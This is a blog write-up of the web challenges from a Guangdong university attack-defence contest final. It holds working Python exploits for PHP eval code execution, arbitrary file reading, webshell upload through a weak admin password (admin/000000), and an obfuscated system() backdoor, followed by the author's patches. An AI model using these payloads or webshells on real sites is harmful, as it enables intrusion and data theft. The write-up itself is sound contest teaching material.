第二届广东大学生网络安全攻防大赛决赛Web题目WriteUP

0x00 前言

第二届广东大学生网络安全攻防大赛决赛,比赛时长为4小时。线下总决赛为DAWD(Data-Con-AWD)攻防模式,参赛队伍在网络空间互相进行攻击和防守,挖掘网络服务漏洞并攻击对手服务来得分,修补自身服务漏洞进行防御来避免丢分。攻防模式可以实时通过得分反映出比赛情况,最终也以得分直接分出胜负,是一种竞争激烈,具有很强观赏性和高度透明性的网络安全赛制。在这种赛制中,不仅仅是比参赛队员的智力和技术,同时也比团队之间的分工配合与合作。上一届决赛是AWD模式,可以上机上WAF去分析流量,写脚本批量攻击拿flag。上次还出现过删站操作,简直群魔乱舞,这次还准备上长亭开源WAF来着,可惜是DAWD,但这种赛制比下来确实还不错,对选手进行了保障。

0x01 题目

比赛题目分为PWN和WEB两个方面,分别有两道题目,一道简单一道难。

minicms

这一题相对简单,主要是代码审计、编写攻击脚本、修复编写。比赛一开始写出EXP的先后顺序基本上就确定了排名位置。

目录结构:

│  index.php

├─mc-admin
│ conf.php
│ editor.php
│ foot.php
│ head.php
│ index.php
│ page-edit.php
│ page.php
│ post-edit.php
│ post.php
│ style.css

└─mc-files
│ markdown.php
│ mc-conf.php
│ mc-core.php
│ mc-rss.php
│ mc-tags.php

├─pages
│ ├─data
│ └─index
│ delete.php
│ draft.php
│ publish.php

├─posts
│ ├─data
│ │ tucvj0.dat
│ │
│ └─index
│ delete.php
│ draft.php
│ publish.php

└─theme
index.php
style.css

题目漏洞挖掘

审计工具结果:

我们只需要关注可以Getshell和读取文件的地方。

漏洞点1:minicms\index.php

首页存在一句话代码执行。

漏洞点2:minicms\mc-files\mc-core.php

文件下载功能存在任意文件下载漏洞。

EXP编写

EXP1:首页代码执行

import sys
import requests


try:
HOST = sys.argv[1]
PORT = sys.argv[2]
except:
pass


header = {
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0"
}
url = f"http://{HOST}:{PORT}"
data = {"1": "system('cat /flag');"}


def exp_1():
ans = requests.post(url=url, headers=header, data=data)
print(ans.text)


exp_1()

EXP2:任意文件读取

import sys
import requests


try:
HOST = sys.argv[1]
PORT = sys.argv[2]
except:
pass


header = {
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0"
}
url = f"http://{HOST}:{PORT}"

def exp_2(poc="/mc-files/mc-core.php?file=/flag"):
ans = requests.post(url=url+poc, headers=header, data=data)
print(ans.text)

exp_2()

PATCH编写

index.php 修复

直接删除@eval($_POST[1]);代码即可。

mc-core.php 修复

  1. 增加了对 $file 的安全验证,确保 $file 不为空、是字符串类型、不包含 /(防止通过路径遍历攻击)、并且存在于文件系统中。
  2. 使用 realpath 函数获取 $file 的绝对路径,避免可能存在的路径遍历攻击。
  3. 检查 $file 的路径是否是 DIR 的子路径,以确保下载的文件在当前脚本所在的目录下,防止可能存在的路径遍历攻击。

ezphp

相对上一道题目,这一道题目相对来说难一些,但其实也很简单。主要的漏洞是文件上传后获取网站源码并进行代码审计。在这一题中漏洞点比较多,后门也比较多,在这一题中我们拿到了一血。

不过web题目,被对手流量分析后其实很快就能相同利用,相对的,我们也通过流量分析拿到了其他的漏洞点。最后呈现的是4个EXP。

题目漏洞挖掘

代码审计工具记录:

D盾查杀情况:

河马查杀情况:

漏洞点1:后台木马文件上传

当时直接找到后台使用弱口令admin/000000进入后台了。一开始我们尝试寻找文件下载、SQL注入、命令/代码执行漏洞,无果。文件上传的地方都是白名单。

后面在系统设置中找到了上传配置,这里直接添加php类型,并且把上传文件大小修改成5000

上传PHP木马后将站点源码打包下载到本地进行分析。修复时尝试修改管理员密码还发现无法修改。

从源码上可以看到是设置覆盖默认的。文件:app\admin\controller\Upload.php

漏洞点2:代码执行漏洞

app\index\controller\Form.php该文件存在 eval 代码执行函数。

漏洞点3:后门

public\uploads\admin\201910\this_is_big.php这个文件结构简单,是一个后门文件。

  1. $a = substr_replace(“xxser”,”syste”,-3); 将字符串 “xxser” 中的最后三个字符 “ser” 替换为 “syste”,结果是 $a = “xxsystem”.
  2. $aa = array(‘’,$a); 创建一个数组,包含两个元素 ‘’ 和 $a.
  3. $b = $aa[1].chr(‘109’); 将数组中第二个元素 $a 和 ASCII 码为 109 的字符 m 拼接在一起,结果是 $b = “xxsystemm”.
  4. $fun=preg_replace(“/xx/“,””,$b); 将字符串 $b 中的所有 xx 替换为空字符串 “”,结果是 $fun = “systemm”.
  5. $cc = substr_replace(“”,$fun,0); 将空字符串 “” 中的所有字符都替换为 $fun,结果是 $cc = “systemm”.
  6. $cc($_POST[‘x’]); 执行 $cc 中存储的函数,将用户提交的数据 $_POST[‘x’] 作为参数传递给该函数。

漏洞点4:生成Shell

app\index\controller\index.php 这个文件里有个 shell 函数,它会生成后门文件。

这里直接用360杀毒都能扫描出来,当然也可以使用D盾、河马WebShell效果差不多。

EXP编写

EXP1:代码执行漏洞

import sys
import requests

try:
HOST = sys.argv[1]
PORT = sys.argv[2]
except:
pass

url = f"http://{HOST}:{PORT}/index/form/index"
headers = {
'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/112.0',
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8',
'Accept-Language': 'zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2',
'Accept-Encoding': 'gzip, deflate',
'Connection': 'close',
'Upgrade-Insecure-Requests': '1',
'Sec-Fetch-Dest': 'document',
'Sec-Fetch-Mode': 'navigate',
'Sec-Fetch-Site': 'none',
'Sec-Fetch-User': '?1',
'Content-Type': 'application/x-www-form-urlencoded'
}

data = {
'form_id': "system('cat /flag');"
}

response = requests.post(url, headers=headers, data=data)
print(response.text.split('\n')[0])

EXP2:后台木马文件上传

import sys
import requests

try:
HOST = sys.argv[1]
PORT = sys.argv[2]
except:
pass


uri = f"http://{HOST}:{PORT}"
def Login():

url = uri+'/admin/Login/index.html?jstime=1681524228621'
headers = {
'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/113.0',
'Accept': 'application/json, text/javascript, */*; q=0.01',
'Accept-Language': 'zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2',
'Accept-Encoding': 'gzip, deflate',
'Content-Type': 'application/x-www-form-urlencoded; charset=UTF-8',
'X-Requested-With': 'XMLHttpRequest',
'Origin': 'http://127.0.0.1:34001',
'Referer': 'http://127.0.0.1:34001/admin/Login/index.html',
'Connection': 'close',
'Content-Length': '42',
'Sec-Fetch-Dest': 'empty',
'Sec-Fetch-Mode': 'cors',
'Sec-Fetch-Site': 'same-origin'
}

data = {
'username': 'admin',
'password': '000000',
'verify': 'aaaa'
}

response = requests.post(url, headers=headers, data=data)
cookie = response.cookies.get_dict();
return cookie

def move(cookies):
url = uri+'/admin/Config/index?jstime=1681524476984'
headers = {
'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/113.0',
'Accept': 'application/json, text/javascript, */*; q=0.01',
'Accept-Language': 'zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2',
'Accept-Encoding': 'gzip, deflate',
'Content-Type': 'application/x-www-form-urlencoded;charset=utf-8',
'X-Requested-With': 'XMLHttpRequest',
'Origin': 'http://127.0.0.1:34001',
'Referer': 'http://127.0.0.1:34001/admin/Config',
'Connection': 'close',
'Content-Length': '677'
}

data = {
'site_status': '1',
'mobil_status': '2',
'site_title': 'xhcms后台系统',
'site_logo': '/uploads/admin/201910/5db6890644255.jpg',
'keyword': '停车场,高铁,飞机场,测试',
'description': '停车管理系统',
'file_size': '5000',
'cnzz': '',
'sub_title': '武汉网站建设',
'file_type': 'gif,png,jpg,jpeg,doc,docx,xls,xlsx,csv,pdf,rar,zip,txt,mp4,flv,php,php5',
'default_themes': 'index',
'off_msg': '站点维护中',
'mobil_domain': '',
'mobil_themes': ''
}

response = requests.post(url, headers=headers, cookies=cookies, data=data)


def upload(cookies):
url = uri+'/admin/Upload/uploadImages.html'
headers = {
'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/112.0',
'Accept': '*/*',
'Accept-Language': 'zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2',
'Accept-Encoding': 'gzip, deflate',
'Origin': 'http://127.0.0.1:34001',
'Connection': 'close',
'Referer': 'http://127.0.0.1:34001/admin/Config',
'Sec-Fetch-Dest': 'empty',
'Sec-Fetch-Mode': 'cors',
'Sec-Fetch-Site': 'same-origin'
}
data={
"id":"WU_FILE_0",
"name":"1.jpg",
"type":"image/jpeg",
"lastModifiedDate":"2023/4/15 09:33:23",
"size":"849"
}
files={'file': ("1.php",open('q.php', 'rb'),"image/jpeg")}


response = requests.post(url, headers=headers, cookies=cookies, data=data, files=files)
j_data = response.json()
return j_data["data"]

def gogo(path):
url = uri+path

payload = "cmd=system('cat /flag');"
headers = {
"User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/112.0",
"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8",
"Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2",
"Accept-Encoding": "gzip, deflate",
"Content-Type": "application/x-www-form-urlencoded",
"Origin": "http://127.0.0.1:34001",
"Connection": "close",
"Referer": "http://127.0.0.1:34001/mc-admin/page-edit.php",
"Upgrade-Insecure-Requests": "1",
"Sec-Fetch-Dest": "document",
"Sec-Fetch-Mode": "navigate",
"Sec-Fetch-Site": "same-origin",
"Sec-Fetch-User": "?1"
}

response = requests.request("POST", url, headers=headers, data=payload)

print(response.text)

try:
c = Login()
move(c)
p = upload(c)
gogo(p)
except:
pass

这里的q.php内容为<?php eval($_POST["cmd"]);?>

EXP3:后门利用

import sys
import requests

try:
HOST = sys.argv[1]
PORT = sys.argv[2]
except:
pass

url = f"http://{HOST}:{PORT}/uploads/admin/201910/this_is_big.php"
payload = {'x': 'cat /flag'}
headers = {'Content-Type': 'application/x-www-form-urlencoded'}
response = requests.post(url, headers=headers, data=payload)
print(response.text)

EXP4:生成后门利用

import sys
import requests

try:
HOST = sys.argv[1]
PORT = sys.argv[2]
except:
pass

uri = f"http://{HOST}:{PORT}"
def get1():
url = uri+'/index/index/shell'
headers = {
'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/112.0',
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8',
'Accept-Language': 'zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2',
'Accept-Encoding': 'gzip, deflate',
'Connection': 'close',
'Cookie': 'PHPSESSID=99b2ca34904520b4085d5a9ada60fd6b',
'Upgrade-Insecure-Requests': '1',
'Sec-Fetch-Dest': 'document',
'Sec-Fetch-Mode': 'navigate',
'Sec-Fetch-Site': 'none',
'Sec-Fetch-User': '?1',
'Content-Type': 'application/x-www-form-urlencoded'
}
try:
response = requests.get(url,headers=headers,timeout=1)
except:
pass

def gogo():
url = uri+'/uploads/.bk.php'
headers = {
'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/112.0',
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8',
'Accept-Language': 'zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2',
'Accept-Encoding': 'gzip, deflate',
'Connection': 'close',
'Cookie': 'PHPSESSID=99b2ca34904520b4085d5a9ada60fd6b',
'Upgrade-Insecure-Requests': '1',
'Sec-Fetch-Dest': 'document',
'Sec-Fetch-Mode': 'navigate',
'Sec-Fetch-Site': 'none',
'Sec-Fetch-User': '?1',
'Content-Type': 'application/x-www-form-urlencoded'
}

data = {
'cmd': "system('cat /flag');"
}

response = requests.post(url, headers=headers, data=data)

print(response.text)

get1()
gogo()

PATCH编写

Upload.php 修复

我直接写死了file_type不允许配置文件覆盖。

Form.php 修复

这里输入的是模型ID,所以使用正则匹配 $form_id 变量中是否包含除了字母、数字和下划线以外的其他字符,如果有则返回 true,否则返回 false。

也就是说如果 $form_id 中包含除了字母、数字和下划线以外的任何字符,就报错。

Index.php 修复

这里我直接把密码修改成自己都猜不到的了,快速修复。

this_is_big.php 修复

我原本想直接使用echo > this_is_big.php制空该文件的,但后面被扣了150分很难受。

这里我使用正则匹配由大小写字母和数字组成的字符串,并且该字符串长度大于等于 1。如果字符串 $x 符合这个正则表达式,则返回 true,否则返回 false。

如果 $x 等于 “cat /flag”,则输入的内容不符合正则表达式 /^[a-zA-Z0-9]+$/,因为字符串中包含空格和斜杠字符,不仅仅是大小写字母和数字。

0x03 结语

第一次参加这个比赛,也是第一次了解到这种攻防比赛模式。平时都是“安服仔”渗透测试和安全运维接触的多一些,然而在这场比赛中的CTFer比较多,他们比赛经验丰富。这次在团队中我主要负责修复漏洞和上传EXP、PATCH。挖洞和流量分析就交给队友了,他们安服经验也很丰富,我们有很高效的配合模式,可惜比赛经验上略胜一筹,有些遗憾,但尽力效果过也很不错。攻防是永恒的主题,希望这种模式的攻防比赛能够更多一些。

第二届广东大学生网络安全攻防大赛决赛Web题目WriteUP

https://www.en0th.com/posts/f042003a.html

作者

en0th

发布于

2024-04-30

更新于

2024-04-30

许可协议

评论